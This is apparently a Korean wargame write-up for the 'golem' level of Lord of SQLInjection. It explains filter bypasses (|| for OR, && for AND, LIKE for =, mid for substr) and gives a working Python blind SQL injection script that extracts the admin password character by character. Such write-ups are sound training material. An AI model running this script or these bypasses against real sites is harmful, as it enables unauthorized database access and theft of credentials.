LOS(los.rubiya.kr) golem
Blind SQLi 문제이고 몇가지 필터가 걸려있다. 해당 필터를 우회하면 되는데 or는 ||로 and는 %26%26(&&)로 =는 LIKE를 이용하면 되고 substr같은 경우 mid함수를 이용하면 된다. 기존에 썼던 Blind SQLi 스크립트를 그대로 가져와서 살짝 수정해주면 슥삭 풀린다.
...더보기
import urllib2
import requests
flag = ""
length = 0
i = 1
session = dict(PHPSESSID = "0cm1on9va40u9bbtmk9lrr5ghn")
url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw="
while True:
q = url + "' || id like 'admin'%26%26 length(pw) like "+str(i)+"%23"
print 'TEST #',i
print q
r = requests.post(q, cookies=session)
if 'Hello admin' in r.text:
length = i
break
i = i + 1
print " PASSWORD LENGTH : ", length
for j in range(1, length +1):
for i in range(48,123):
q = url + "'||id like 'admin'%26%26mid(pw, "+str(j)+",1) like "+"'"+chr(i)+"'"+"%23"
print 'TEST #', j, '-', i
print q
r = requests.post(q,cookies=session)
if 'Hello admin' in r.text:
flag += chr(i)
print "FLAG : ",flag
break
'Web Hacking > los.rubiya.kr' 카테고리의 다른 글
[Lord of SQLinjection] Bugbear (0) | 2019.08.26 |
---|---|
[Lord of SQLinjection] Darkknight (0) | 2019.08.26 |
[Lord of SQLinjection] Skeleton (0) | 2019.08.18 |
[Lord of SQLinjection] Vampire (0) | 2019.08.18 |
[Lord of SQLInjection] Troll (0) | 2019.08.18 |